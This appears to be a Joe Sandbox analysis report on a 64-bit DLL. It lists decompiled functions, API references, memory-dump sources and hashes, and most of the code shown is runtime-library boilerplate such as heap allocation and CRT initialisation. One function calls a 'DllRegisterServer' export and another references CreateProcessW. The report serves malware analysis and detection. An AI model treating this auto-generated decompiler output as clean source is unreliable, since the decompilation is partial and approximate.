Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction Fuzzy Hash: 6C21FD3251CB9581DA619B29F04032AB7A4FB897E4F004B61F6EE47BE9EF6CD1508B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE62970 Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FFA7FFA0AE62970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed int _v16;
				char _v48;
				long long _v56;
				signed long long _v64;
				signed int _v72;
				void* _t35;
				void* _t37;
				signed long long _t39;
				signed long long _t40;
				signed long long _t61;

				_t37 = __eflags;
				_t36 = __edx;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_t39 =  *0xaede008; // 0xa3acf2c2a32b
				_t40 = _t39 ^ _t61;
				_v16 = _t40;
				_v72 = 0;
				E00007FFA7FFA0AE61760(__edx,  &_v48);
				E00007FFA7FFA0AE61490(_t40, _a16);
				_v64 = _t40;
				E00007FFA7FFA0AE611A0(_a24);
				E00007FFA7FFA0AE62CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
				E00007FFA7FFA0AE62E90( &_v48, _a16);
				E00007FFA7FFA0AE62E60( &_v48, _a24);
				E00007FFA7FFA0AE616A0(__edx, _v64 + _t40, _a8,  &_v48);
				_v72 = _v72 | 0x00000001;
				return E00007FFA7FFA0AE63A70(E00007FFA7FFA0AE61540( &_v48), _t35, _t36, _v16 ^ _t61);
			}

0x7ffa0ae62970
0x7ffa0ae62970
0x7ffa0ae62970
0x7ffa0ae62975
0x7ffa0ae6297a
0x7ffa0ae62983
0x7ffa0ae6298c
0x7ffa0ae62993
0x7ffa0ae62996
0x7ffa0ae6299b
0x7ffa0ae629a8
0x7ffa0ae629b3
0x7ffa0ae629b8
0x7ffa0ae629c5
0x7ffa0ae629dd
0x7ffa0ae629ec
0x7ffa0ae629fe
0x7ffa0ae62a0d
0x7ffa0ae62a19
0x7ffa0ae62a3d

APIs

char_traits.LIBCPMTD ref: 00007FFA0AE629C5
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE629EC
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE629FE

Part of subcall function 00007FFA0AE616A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE616BC

Part of subcall function 00007FFA0AE61540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE61567

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
String ID:
API String ID: 652137993-0
Opcode ID: 64b5ee6111c1e80d1d313e9df5607aec9349095c911cfcd66588a2dc81f66332
Instruction ID: 862326bd618904ba04345173799094bb87bb64d5e1313777d0763dee90474c21
Opcode Fuzzy Hash: 64b5ee6111c1e80d1d313e9df5607aec9349095c911cfcd66588a2dc81f66332
Instruction Fuzzy Hash: CD113073A18A8181DA50EB24F4911ABB760FBC57D4F405632F6CE87AA9EF3CD1458B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61B40 Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFA7FFA0AE61B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed char _t23;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA0AE62250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0xae61b97;
				E00007FFA7FFA0AE618F0(__rax, _a8);
				E00007FFA7FFA0AE61BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
				goto 0xae61be0;
				r8d = 0;
				_t23 = E00007FFA7FFA0AE622B0(_t31, _a8, _a24); // executed
				if ((_t23 & 0x000000ff) == 0) goto 0xae61bdb;
				E00007FFA7FFA0AE618F0(_t31, _a8);
				E00007FFA7FFA0AE611E0(_t31, _a16, _a24);
				return E00007FFA7FFA0AE623A0(_t31, _a8, _a24);
			}

0x7ffa0ae61b40
0x7ffa0ae61b45
0x7ffa0ae61b4a
0x7ffa0ae61b67
0x7ffa0ae61b6e
0x7ffa0ae61b90
0x7ffa0ae61b95
0x7ffa0ae61b97
0x7ffa0ae61ba4
0x7ffa0ae61bae
0x7ffa0ae61bb5
0x7ffa0ae61bc7
0x7ffa0ae61be4

APIs

Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6226B
Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61B6E

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61BB5
char_traits.LIBCPMTD ref: 00007FFA0AE61BC7

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 872432861-0
Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction ID: 59c7a7f15c13a96608699f1423b4263aaf34e4fae2305e5bacf1109575728850
Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction Fuzzy Hash: AB11C777A3CA9181DA41EB66F45146F6360FBC6BC0F106476FE8E87B5AEE2CD4008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE63F18 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA0AE63F18(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0xaedf1a0 & 0x000000ff;
				 *0xaedf1a0 =  ==  ? 1 :  *0xaedf1a0 & 0x000000ff;
				E00007FFA7FFA0AE64760(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFA7FFA0AE66AC0() != 0) goto 0xae63f47;
				goto 0xae63f5b; // executed
				E00007FFA7FFA0AE6A844(_t17); // executed
				if (0 != 0) goto 0xae63f59;
				E00007FFA7FFA0AE66B1C(0);
				goto 0xae63f43;
				return 1;
			}

0x7ffa0ae63f2c
0x7ffa0ae63f2f
0x7ffa0ae63f35
0x7ffa0ae63f41
0x7ffa0ae63f45
0x7ffa0ae63f47
0x7ffa0ae63f4e
0x7ffa0ae63f52
0x7ffa0ae63f57
0x7ffa0ae63f60

APIs

__isa_available_init.LIBCMT ref: 00007FFA0AE63F35
__vcrt_initialize.LIBVCRUNTIME ref: 00007FFA0AE63F3A

Part of subcall function 00007FFA0AE66AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA0AE66AC4
Part of subcall function 00007FFA0AE66AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA0AE66AC9
Part of subcall function 00007FFA0AE66AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA0AE66ACE

__vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA0AE63F52

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
String ID:
API String ID: 3388242289-0
Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction ID: daf25e5ce8496a6c32db0dc259f1bd64d1f10f6f87240d7a9eb3a2dc4753e465
Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction Fuzzy Hash: FFE01A72E0C1A345FE283771F4522F912601F2B780F48C8F9D85E4A1C3AE0D745A6561

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE73F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE73F70() {
				long long _v24;
				long long _t5;
				intOrPtr _t7;

				_v24 = 0;
				_t7 =  *0xaedfdd8; // 0x180000000
				E00007FFA7FFA0AE79600(_t5, "fx", _t7, "DllRegisterServer");
				_v24 = _t5;
				ExitProcess(??);
			}

0x7ffa0ae73f74
0x7ffa0ae73f84
0x7ffa0ae73f92
0x7ffa0ae73f97
0x7ffa0ae73f9c

APIs

ExitProcess.KERNEL32 ref: 00007FFA0AE73F9C

Strings

DllRegisterServer, xrefs: 00007FFA0AE73F7D

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction ID: 92956b3536bb06cc5dfa8f3b5c681ce95655f0d8d7078b68330188f32a14c539
Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction Fuzzy Hash: 0CD05E72908A92C1D720FB60F84539A23B0FF9A308FC082B1D58C42264EF3CE209CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6DEA8 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE6DEA8(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed char _t53;
				signed int _t54;
				void* _t73;
				long long _t77;
				intOrPtr _t78;
				void* _t95;
				long _t98;

				_t73 = _t95;
				 *((long long*)(_t73 + 8)) = __rbx;
				 *((long long*)(_t73 + 0x10)) = __rbp;
				 *((long long*)(_t73 + 0x18)) = __rsi;
				 *((long long*)(_t73 + 0x20)) = __rdi;
				r14d = 0;
				_t77 =  *((intOrPtr*)(0x7ffa0aedf968)) + 2;
				if (_t77 - 1 <= 0) goto 0xae6defb;
				 *0x7FFA0AEDF978 =  *0x7FFA0AEDF978 | 0x00000080;
				goto 0xae6df86;
				 *0x7FFA0AEDF978 = 0x81;
				if (0 == 0) goto 0xae6df1c;
				if (0 == 0) goto 0xae6df15;
				goto 0xae6df21;
				goto 0xae6df21;
				GetStdHandle(_t98);
				_t21 = _t77 + 1; // 0x1
				if (_t21 - 1 <= 0) goto 0xae6df61;
				_t53 = GetFileType(??); // executed
				if (_t53 == 0) goto 0xae6df61;
				_t54 = _t53 & 0x000000ff;
				 *((long long*)(0x7ffa0aedf968)) = _t77;
				if (_t54 != 2) goto 0xae6df55;
				 *0x7FFA0AEDF978 =  *0x7FFA0AEDF978 | 0x00000040;
				goto 0xae6df86;
				if (_t54 != 3) goto 0xae6df86;
				 *0x7FFA0AEDF978 =  *0x7FFA0AEDF978 | 0x00000008;
				goto 0xae6df86;
				 *0x7FFA0AEDF978 =  *0x7FFA0AEDF978 | 0x00000040;
				 *((long long*)( *0x7FFA10C4D6A8 + 0x28)) = 0xfffffffe;
				_t78 =  *0xaedfd78; // 0x0
				if (_t78 == 0) goto 0xae6df86;
				 *((intOrPtr*)( *((intOrPtr*)(_t98 + _t78)) + 0x18)) = 0xfffffffe;
				if (1 != 3) goto 0xae6dec6;
				return _t54;
			}

0x7ffa0ae6dea8
0x7ffa0ae6deab
0x7ffa0ae6deaf
0x7ffa0ae6deb3
0x7ffa0ae6deb7
0x7ffa0ae6dec3
0x7ffa0ae6dee7
0x7ffa0ae6deef
0x7ffa0ae6def1
0x7ffa0ae6def6
0x7ffa0ae6defb
0x7ffa0ae6df04
0x7ffa0ae6df09
0x7ffa0ae6df13
0x7ffa0ae6df1a
0x7ffa0ae6df21
0x7ffa0ae6df2a
0x7ffa0ae6df32
0x7ffa0ae6df37
0x7ffa0ae6df3f
0x7ffa0ae6df41
0x7ffa0ae6df44
0x7ffa0ae6df4c
0x7ffa0ae6df4e
0x7ffa0ae6df53
0x7ffa0ae6df58
0x7ffa0ae6df5a
0x7ffa0ae6df5f
0x7ffa0ae6df61
0x7ffa0ae6df66
0x7ffa0ae6df6f
0x7ffa0ae6df79
0x7ffa0ae6df7f
0x7ffa0ae6df8f
0x7ffa0ae6dfaf

APIs

GetStdHandle.KERNEL32 ref: 00007FFA0AE6DF21
GetFileType.KERNELBASE ref: 00007FFA0AE6DF37

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
Instruction ID: fd549212c02990f924bc44928cc8c0ff331d9515692d4c7cf2dcea34f3daf3ac
Opcode Fuzzy Hash: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
Instruction Fuzzy Hash: 71317433B18F6581E7609B24E9802786650FB4ABF0BA45779EB6E473E0DF38E461C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6A9DC Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00007FFA7FFA0AE6A9DC(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0xae6aa17;
				_t14 =  *0xaedf930; // 0x20508390000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0xae6aa12;
				_t3 = E00007FFA7FFA0AE6B34C(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FFA7FFA0AE6B420(__rax);
				 *__rax = _t3;
				return _t4;
			}

0x7ffa0ae6a9df
0x7ffa0ae6a9eb
0x7ffa0ae6a9f2
0x7ffa0ae6a9fa
0x7ffa0ae6aa04
0x7ffa0ae6aa0b
0x7ffa0ae6aa10
0x7ffa0ae6aa17

APIs

RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFA0AE6F492,?,?,?,00007FFA0AE6F4CF,?,?,00000000,00007FFA0AE6F144,?,?,?,00007FFA0AE6F077), ref: 00007FFA0AE6A9F2
GetLastError.KERNEL32(?,?,00000000,00007FFA0AE6F492,?,?,?,00007FFA0AE6F4CF,?,?,00000000,00007FFA0AE6F144,?,?,?,00007FFA0AE6F077), ref: 00007FFA0AE6A9FC

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction ID: 1dc2012048c57834dbf89f6a0a3c98f1380f3016787cd9640d87fc6890232cc3
Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction Fuzzy Hash: 6BE08622F0921243FF087BF2F44403812909F47B80F44C8B4C80D97261FE3C6C454244

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE622B0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA0AE622B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
				long long _v16;
				signed char _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;

				_t48 = __rax;
				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE62830(__rax, _a8);
				if (_t48 - _a16 >= 0) goto 0xae622de;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62150(_t48, _a8);
				if ( *_t48 - _a16 >= 0) goto 0xae62310;
				E00007FFA7FFA0AE62170(_t48, _a8);
				E00007FFA7FFA0AE62600(_a8, _a16,  *_t48); // executed
				goto 0xae6237a;
				if ((_a24 & 0x000000ff) == 0) goto 0xae62366;
				if (_a16 - 0x10 >= 0) goto 0xae62366;
				E00007FFA7FFA0AE62170(_t48, _a8);
				if (_a16 -  *_t48 >= 0) goto 0xae62341;
				_t50 = _a16;
				_v16 = _t50;
				goto 0xae62353;
				E00007FFA7FFA0AE62170(_t50, _a8);
				_v16 =  *_t50;
				E00007FFA7FFA0AE61910(1,  *_t50, _a8, _v16);
				goto 0xae6237a;
				if (_a16 != 0) goto 0xae6237a;
				E00007FFA7FFA0AE623A0( *_t50, _a8, _a16);
				if (_a16 <= 0) goto 0xae6238c;
				_v24 = 1;
				goto 0xae62394;
				_v24 = 0;
				return _v24 & 0x000000ff;
			}

0x7ffa0ae622b0
0x7ffa0ae622b0
0x7ffa0ae622b5
0x7ffa0ae622ba
0x7ffa0ae622c8
0x7ffa0ae622d2
0x7ffa0ae622d9
0x7ffa0ae622e3
0x7ffa0ae622f0
0x7ffa0ae622f7
0x7ffa0ae62309
0x7ffa0ae6230e
0x7ffa0ae62317
0x7ffa0ae6231f
0x7ffa0ae62326
0x7ffa0ae62333
0x7ffa0ae62335
0x7ffa0ae6233a
0x7ffa0ae6233f
0x7ffa0ae62346
0x7ffa0ae6234e
0x7ffa0ae6235f
0x7ffa0ae62364
0x7ffa0ae6236c
0x7ffa0ae62375
0x7ffa0ae62380
0x7ffa0ae62382
0x7ffa0ae6238a
0x7ffa0ae6238c
0x7ffa0ae6239d

APIs

Part of subcall function 00007FFA0AE62830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6283E
Part of subcall function 00007FFA0AE62830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA0AE6284B

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE622D9

Part of subcall function 00007FFA0AE62170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6217E

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
String ID:
API String ID: 1903167320-0
Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction ID: 79af48ee9c3734f0239ce58a1dae39387a3090d5d4abc403722913dd1f690087
Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction Fuzzy Hash: C521CF33D0CA5281DA10AB25F4503AEAB70FBC67C4F608875E78D476A9EF3DD5508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6AAD0 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE6AAD0(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0xae6aaef;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0xae6ab32;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0xae6ab16;
				if (E00007FFA7FFA0AE6E958() == 0) goto 0xae6ab32;
				if (E00007FFA7FFA0AE697EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xae6ab32;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0xae6ab01;
				goto 0xae6ab3f;
				E00007FFA7FFA0AE6B420(_t22);
				 *_t22 = 0xc;
				return 0;
			}

0x7ffa0ae6aad0
0x7ffa0ae6aadf
0x7ffa0ae6aae3
0x7ffa0ae6aae3
0x7ffa0ae6aaed
0x7ffa0ae6aafb
0x7ffa0ae6aaff
0x7ffa0ae6ab08
0x7ffa0ae6ab14
0x7ffa0ae6ab25
0x7ffa0ae6ab2e
0x7ffa0ae6ab30
0x7ffa0ae6ab32
0x7ffa0ae6ab37
0x7ffa0ae6ab44

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA0AE6BAAE,?,?,?,00007FFA0AE6B429,?,?,?,?,00007FFA0AE70426,?,?,00000000), ref: 00007FFA0AE6AB25

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction ID: aa872346bc4264b70d333165019709248f038d693b4a3183def092d8cff0e99c
Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction Fuzzy Hash: 6CF06D26F0A22341FE587B72F5112B503A65F66BC4F8CC8B0C80E973D2FE2CE8818210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6AA18 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE6AA18(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0xae6aa63;
				_t16 =  ==  ? __rax : __rcx;
				goto 0xae6aa4a;
				if (E00007FFA7FFA0AE6E958() == 0) goto 0xae6aa63;
				if (E00007FFA7FFA0AE697EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0xae6aa63;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0xae6aa35;
				goto 0xae6aa70;
				E00007FFA7FFA0AE6B420(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ffa0ae6aa25
0x7ffa0ae6aa2f
